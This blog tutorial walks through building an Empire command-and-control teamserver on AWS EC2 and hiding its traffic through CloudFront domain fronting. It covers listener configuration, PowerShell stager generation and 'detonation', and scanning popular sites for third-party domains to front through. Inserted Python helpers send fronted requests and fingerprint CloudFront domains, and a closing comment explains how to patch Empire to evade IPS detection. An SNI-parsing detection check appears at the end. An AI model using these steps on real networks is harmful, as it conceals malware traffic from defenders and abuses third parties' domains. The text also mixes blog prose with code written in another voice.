Domain fronting is a technique for obfuscating the intended destination of HTTP(S) traffic: the connection (the DNS lookup and, for HTTPS, the TLS SNI) goes to a high-reputation domain, while only the HTTP Host header names the real target. This allows attackers to circumvent egress security controls by masking the intended destination with “trusted” domains. In this blog post, I will set up AWS’s CloudFront CDN service to mask the destination of my Empire TeamServer. One caveat: in April 2018 AWS changed CloudFront to require that the Host header of an HTTPS request belong to a domain covered by the TLS certificate used for the SNI name, so expect the HTTPS variant of this setup to fail on CloudFront today.
DISCLAIMER
The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises.
DISCLAIMER
What is domain fronting?
As stated in the Red-Team-Infrastructure-Wiki, “In a nutshell, traffic uses the DNS and SNI name of the trusted service provider, Google is used in the example below. When the traffic is received by the Edge Server (ex: located at gmail.com), the packet is forwarded to the Origin Server (ex: phish.appspot.com) specified in the packet’s Host header. Depending on the service provider, the Origin Server will either directly forward traffic to a specified domain, which we’ll point to our team server, or a proxy app will be required to perform the final hop forwarding.”
Network diagram
Create AWS resources
Create EC2 Empire teamserver
- Select “EC2” from the list of services
- Select “Launch instance”
- Step 1: Choose an Amazon Machine Image (AMI)
- Select “Ubuntu Server 16.04 LTS (HVM), SSD Volume Type”
- Step 2: Choose an Instance Type
- Select “t2.medium”
- Select “Configure Instance Details”
- Step 3: Configure Instance Details
- Select “default” for network
- Select “No preference” for Subnet
- Select “Enable” for “Auto-assign Public IP”
- Select “Next: Add storage”
- Step 4: Add Storage
- Enter “20” for “Size (GiB)”
- Select “Add tags”
- Step 5: Add tags
- Select “Add tag”
- Enter “Name” for key
- Enter “Redteam-teamserver” for value
- Select “Configure Security Group”
- Step 6: Configure Security Group
- Enter “Redteam-teamserver” for security group name
- For the SSH rule enter YOUR public IP for source
- My school has a public IP range, which I will use
- Select “Add rule”
- Set type to “HTTP”
- Enter “0.0.0.0/0” for source (CloudFront edge nodes fetch from the origin, so this rule cannot be limited to your own IP; it can later be tightened to the CLOUDFRONT ranges published in https://ip-ranges.amazonaws.com/ip-ranges.json)
- Select “Review and Launch”
- Step 7: Review Instance Launch
- Select Launch
- For the Key pair select “existing key pair” or “new key pair”
- Select “Launch instance”
- Select “View instances”
- Wait for new instance to initialize completely
- The “Status checks” column should be “2/2 checks passed”
- Copy the “IPv4 Public IP” for the new instance
Create CloudFront instance
- Select “CloudFront” from AWS services
- Select “Create Distribution”
- Select “Get started” under “Web” for delivery method
- Origin settings
- Enter “empire.hackinglab.beer” for Origin Domain Name
- Select “HTTP and HTTPS” for Viewer Protocol Policy
- Default Cache Behavior Settings
- Select “GET, HEAD, OPTIONS, PUT, POST, PATCH, DELETE” for Allowed HTTP Methods
- Select “All” for Forwarding Cookies
- Select “Forward all, cache based on all” for Query String Forwarding and Caching
- Select “Create distribution”
- The creation of this resource may take up to 20 mins.
Setup/Configure domains via Namecheap
This guide assumes you already have domains purchased. You DO NOT have to use Namecheap but it is my registrar of choice :). I will be using the domain “hackinglab.beer” for my teamserver.
Hackinglab.beer – teamserver
- Log into Namecheap.com
- Select “Domain list” on the left
- Select “Manage” by the domain you wish to configure
- Select the “Advanced DNS” tab at the top
- Select “Add new record”
- Select “A record” for type
- Enter “empire” for host
- Enter “<EC2 public IP addr for Empire teamserver>” for value
- Select the check mark to save record
Testing CDN
- ssh ubuntu@<EC2 public IP addr for Empire teamserver>
- cd /tmp
- echo "<html><p>hello world</p></html>" > hello
- sudo python -m SimpleHTTPServer 80 (or sudo python3 -m http.server 80 if only Python 3 is installed)
- curl http://d0.awsstatic.com/hello --header 'Host: <CloudFront domain name>'
- The CloudFront domain name is the d….cloudfront.net value in the “Domain Name” column of the Distributions list in the CloudFront console; a “hello world” response means the edge honoured the Host header and fetched the file from the teamserver.
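Here is the same test as the curl command above written out in Python, so that the mechanism the wiki quote describes is explicit: the socket (and, for HTTPS, the SNI) goes to the front domain, while only the Host header names the CloudFront distribution. This is an added example, not code from the post or from Empire; FRONT_DOMAIN, DISTRIBUTION and the /hello path are placeholders for your own values, and the response classification is my reading of the codes CloudFront returns (403 when it will not serve that Host, 502/504 when the distribution cannot reach the origin).

```python
import socket
import ssl

# Placeholders (assumptions for this example): the domain the socket connects to,
# and the CloudFront distribution that actually routes to the Empire origin.
FRONT_DOMAIN = "d0.awsstatic.com"
DISTRIBUTION = "d1234567890abc.cloudfront.net"   # replace with your distribution


def build_request(path, host_header, user_agent="curl/7.58.0"):
    """Raw HTTP/1.1 request whose Host header differs from the host we connect to."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host_header}\r\n"
        f"User-Agent: {user_agent}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def parse_response(raw):
    """Split a raw HTTP response into (status_code, headers dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify(status, body, marker=b"hello world"):
    """Interpret the edge server's answer to the fronted request."""
    if status == 200 and marker in body:
        return "fronted"              # edge honoured the Host header and hit our origin
    if status == 403:
        return "rejected"             # CloudFront refused to serve that Host from this front
    if status in (502, 504):
        return "origin-unreachable"   # distribution is fine, origin or security group is not
    return "unexpected"


def front_request(front_domain, host_header, path="/hello", https=False, timeout=10):
    """Connect to front_domain but ask, via the Host header, for host_header's content."""
    port = 443 if https else 80
    sock = socket.create_connection((front_domain, port), timeout)
    if https:
        ctx = ssl.create_default_context()
        # SNI carries the front domain; only the encrypted Host header names the distribution
        sock = ctx.wrap_socket(sock, server_hostname=front_domain)
    with sock:
        sock.sendall(build_request(path, host_header))
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
    status, headers, body = parse_response(b"".join(chunks))
    return classify(status, body), status, headers


if __name__ == "__main__":
    verdict, status, headers = front_request(FRONT_DOMAIN, DISTRIBUTION)
    print(verdict, status, headers.get("via", ""))
```

Run it while the SimpleHTTPServer from the steps above is still up; a `fronted` verdict together with a Via header ending in `(CloudFront)` means the edge honoured the Host header and fetched /hello from your origin rather than from awsstatic.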
Install/Setup Empire
- ssh ubuntu@<EC2 public IP addr for Empire teamserver>
- sudo apt update -y && sudo apt upgrade -y
- git clone https://github.com/EmpireProject/Empire.git
- cd Empire
- sudo ./setup/install.sh
- ./empire
Create listener
- listeners
- uselistener http
- set Name awsDF
- set Host http://d0.awsstatic.com:80
- set DefaultProfile /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Host: <CloudFront domain name>
- execute
- back
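An added example (mine, not Empire's) that parses the DefaultProfile string from the listener above and checks the one thing that makes the fronting work: the listener's Host option is the domain the agent connects to, and the Host header inside the profile must be your distribution name, not that same front domain. The distribution name in the self-test is a placeholder; the profile format follows the page (comma-separated request URIs, then the User-Agent, then pipe-separated "Name: value" headers, which is how Empire's http listener reads any further fields).

```python
def parse_profile(profile):
    """Split 'uri1,uri2|User-Agent|Header: value[|Header: value...]' into parts.

    Fields are pipe-separated: request URIs (comma-separated), the User-Agent,
    then zero or more 'Name: value' headers.
    """
    parts = profile.split("|")
    if len(parts) < 2:
        raise ValueError("profile needs at least 'uris|user-agent'")
    uris = [u.strip() for u in parts[0].split(",") if u.strip()]
    user_agent = parts[1].strip()
    headers = {}
    for field in parts[2:]:
        name, sep, value = field.partition(":")
        if not sep:
            raise ValueError(f"header field without ':': {field!r}")
        headers[name.strip()] = value.strip()
    return uris, user_agent, headers


def check_fronted_profile(profile, listener_host, distribution):
    """Return a list of problems that would break fronting; empty means it looks right.

    listener_host is the listener's Host option (the URL the agent connects to);
    distribution is the d....cloudfront.net name the Host header must carry.
    """
    problems = []
    uris, user_agent, headers = parse_profile(profile)
    if not uris or not all(u.startswith("/") for u in uris):
        problems.append("every request URI must start with '/'")
    if not user_agent:
        problems.append("empty User-Agent")
    host = {k.lower(): v for k, v in headers.items()}.get("host")
    if host is None:
        problems.append("no Host header: requests would be served for the front domain itself")
    elif host.lower() != distribution.lower():
        problems.append(f"Host header {host!r} is not the distribution {distribution!r}")
    # strip scheme, port and path from the listener Host URL to get the connect-to name
    connect_to = listener_host.split("://", 1)[-1].split("/", 1)[0].split(":", 1)[0]
    if host is not None and connect_to.lower() == host.lower():
        problems.append("listener Host and Host header are identical; nothing is fronted")
    return problems


if __name__ == "__main__":
    # constructed sample matching the listener above; the distribution is a placeholder
    sample = ("/admin/get.php,/news.php,/login/process.php|"
              "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|"
              "Host: d1234567890abc.cloudfront.net")
    print(check_fronted_profile(sample, "http://d0.awsstatic.com:80",
                                "d1234567890abc.cloudfront.net") or "profile looks fronted")
```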
Generate Powershell Stager
- usestager multi/launcher awsDF
- execute
Detonate Powershell stager
- Boot up a Windows VM
- Open a Powershell prompt
- Paste Powershell stager from above and hit enter
Hammer time
So let’s take domain fronting to the NEXT NEXT level. We will use a script created by rvrsh3ll to find domains that are served through CloudFront. This will allow us to use those domains as the apparent “destinations” for our traffic. This activity may be considered illegal, so proceed with caution and only if you have PERMISSION.
Rvrsh3ll – FindFrontableDomains
- git clone https://github.com/rvrsh3ll/FindFrontableDomains.git
- pip install -r requirements
- ./setup.sh
- python FindFrontableDomains.py --alexa 10000 --threads 20
Testing domain
- Select a domain that utilizes CloudFront
- Using a domain without authorization may be illegal, proceed with caution.
- curl http://<Domain using CloudFront>/hello --header 'Host: <CloudFront domain name>'
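Before running the curl test above against a candidate, it helps to confirm that the domain really sits behind CloudFront. The following is an added example (not FindFrontableDomains' code) with two checks that can be tested offline, a canonical name ending in cloudfront.net and CloudFront's own response headers (a Via hop ending in (CloudFront), X-Cache "... from cloudfront", X-Amz-Cf-Id / X-Amz-Cf-Pop), plus a live wrapper that runs both against one domain. The header fingerprints are the ones CloudFront adds to responses it serves; the canonical-name lookup assumes the local resolver follows the CNAME, which most do.

```python
import http.client
import socket


def is_cloudfront_alias(canonical_name):
    """True when a resolved canonical name ends in cloudfront.net (a CNAME to CloudFront)."""
    return canonical_name.rstrip(".").lower().endswith(".cloudfront.net")


def served_by_cloudfront(headers):
    """True when HTTP response headers carry CloudFront's fingerprints.

    headers: iterable of (name, value) pairs, as http.client's getheaders() returns.
    """
    h = {name.lower(): value for name, value in headers}
    if "x-amz-cf-id" in h or "x-amz-cf-pop" in h:
        return True
    if "cloudfront" in h.get("via", "").lower():
        return True
    return "from cloudfront" in h.get("x-cache", "").lower()


def check_candidate(domain, timeout=10):
    """Live check of one domain from the FindFrontableDomains output.

    Returns (dns_says_cloudfront, http_says_cloudfront). Both True is a good
    candidate for the curl test above; DNS alone can be stale, HTTP alone can
    be a different CDN that copied the header names.
    """
    canonical, _, _ = socket.gethostbyname_ex(domain)   # canonical name after CNAME chasing
    dns_hit = is_cloudfront_alias(canonical)
    conn = http.client.HTTPConnection(domain, 80, timeout=timeout)
    try:
        conn.request("HEAD", "/")
        resp = conn.getresponse()
        http_hit = served_by_cloudfront(resp.getheaders())
        resp.read()
    finally:
        conn.close()
    return dns_hit, http_hit


if __name__ == "__main__":
    import sys
    for name in sys.argv[1:]:
        print(name, check_candidate(name))
```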
Create Empire Listener
- Enter “exit” into Empire
- ./setup/reset.sh
- ./empire
- listeners
- uselistener http
- set Name awsDF
- set Host http://<Domain using CloudFront>:80
- set DefaultProfile /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko|Host: <CloudFront domain name>
- The Host header must again be your distribution’s d….cloudfront.net name, exactly as in the first listener; the frontable domain belongs only in the Host option above, otherwise the edge serves the frontable site’s own content.
- execute
- back
Generate Powershell stager
- usestager multi/launcher awsDF
- execute
- Copy contents of stager
Detonate Powershell stager
- Boot up a Windows VM
- Open a Powershell prompt
- Paste Powershell stager from above and hit enter
Maybe you know (maybe not), but Empire has some vulns or mistakes with domain fronting. Therefore any advanced IPS and threat-intel systems can easily detect your originating domain.
You can fire up Wireshark and look at the SSL traffic (specifically the Server Name extension field of the SSL hello packet). You will see that this field is set to your originating domain, not cloudfront or anything else.
This is because of some factors:
1) Empire sends the wrong packet at staging
The main idea is correct: establish a connection to the fronted domain and then DO NOT RESET the TCP connection, and use it to connect to your original domain. The main problem is that if the first connection goes to AWS CloudFront, then AWS gives a 403 HTTP code and the .NET framework resets the TCP connection. So the second web request from Empire will establish a new TCP connection with your domain’s SNI.
To mitigate this you have to connect to a specific URL of the fronting domain so the response will be 200 or 404 (not 403, 502 or something else). To do this you have to modify the first Empire stager…
2) domain fronting is not supported in the PS agent (I suppose they forgot to add DF support in the agent)
You have to modify the Empire ps1 agent to add support for domain fronting as it is in the stager…
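The field the comment above points at can be checked without Wireshark. This is an added example (not the commenter's code and not Empire's): it builds a constructed TLS 1.2 ClientHello for its own self-test instead of using a capture, extracts the host_name from the server_name extension, and compares it with the front the agent was supposed to be talking to, which is the check a network sensor makes when it knows which fronts are legitimate. It applies to HTTPS listeners only; the port-80 listener built above sends no SNI at all, but its Host header is then visible in cleartext to anything on the path.

```python
import os
import struct


def build_client_hello(server_name):
    """Constructed minimal TLS 1.2 ClientHello record carrying an SNI extension.

    Sample for the self-test, not a captured packet; the random value, cipher
    suite and compression method are placeholders.
    """
    name = server_name.encode("ascii")
    server_name_list = b"\x00" + struct.pack("!H", len(name)) + name      # name_type 0 = host_name
    sni_data = struct.pack("!H", len(server_name_list)) + server_name_list
    sni_ext = struct.pack("!HH", 0x0000, len(sni_data)) + sni_data           # extension type 0 = server_name
    other_ext = struct.pack("!HH", 0x0017, 0)                                 # extended_master_secret, empty
    extensions = other_ext + sni_ext
    body = (
        b"\x03\x03" + os.urandom(32)                      # client_version, random
        + b"\x00"                                         # session_id length 0
        + struct.pack("!H", 2) + b"\xc0\x2f"              # one cipher suite
        + b"\x01\x00"                                     # one compression method (null)
        + struct.pack("!H", len(extensions)) + extensions
    )
    handshake = b"\x01" + struct.pack("!I", len(body))[1:] + body            # type 1 = client_hello, 3-byte length
    return b"\x16\x03\x01" + struct.pack("!H", len(handshake)) + handshake   # record type 22 = handshake


def extract_sni(record):
    """Return the host_name from a ClientHello's server_name extension, or None."""
    if len(record) < 9 or record[0] != 0x16 or record[5] != 0x01:
        return None
    pos = 9                                   # record header (5) + handshake header (4)
    pos += 2 + 32                             # client_version + random
    pos += 1 + record[pos]                    # session_id
    pos += 2 + struct.unpack("!H", record[pos:pos + 2])[0]   # cipher_suites
    pos += 1 + record[pos]                    # compression_methods
    if pos + 2 > len(record):
        return None                           # no extensions block at all
    ext_end = pos + 2 + struct.unpack("!H", record[pos:pos + 2])[0]
    pos += 2
    while pos + 4 <= ext_end:
        ext_type, ext_len = struct.unpack("!HH", record[pos:pos + 4])
        pos += 4
        if ext_type == 0x0000:
            # server_name_list: 2-byte list length, then entries of type(1) len(2) name
            p = pos + 2
            while p + 3 <= pos + ext_len:
                name_type = record[p]
                name_len = struct.unpack("!H", record[p + 1:p + 3])[0]
                p += 3
                if name_type == 0:
                    return record[p:p + name_len].decode("ascii", "replace")
                p += name_len
        pos += ext_len
    return None


def sni_mismatch(record, expected_front):
    """Detection check: does this ClientHello name something other than the front?"""
    sni = extract_sni(record)
    return sni is not None and sni.lower() != expected_front.lower()


if __name__ == "__main__":
    # the reconnect the comment describes: the second hello names the origin, not the front
    hello = build_client_hello("empire.hackinglab.beer")
    print(extract_sni(hello), sni_mismatch(hello, "d0.awsstatic.com"))
```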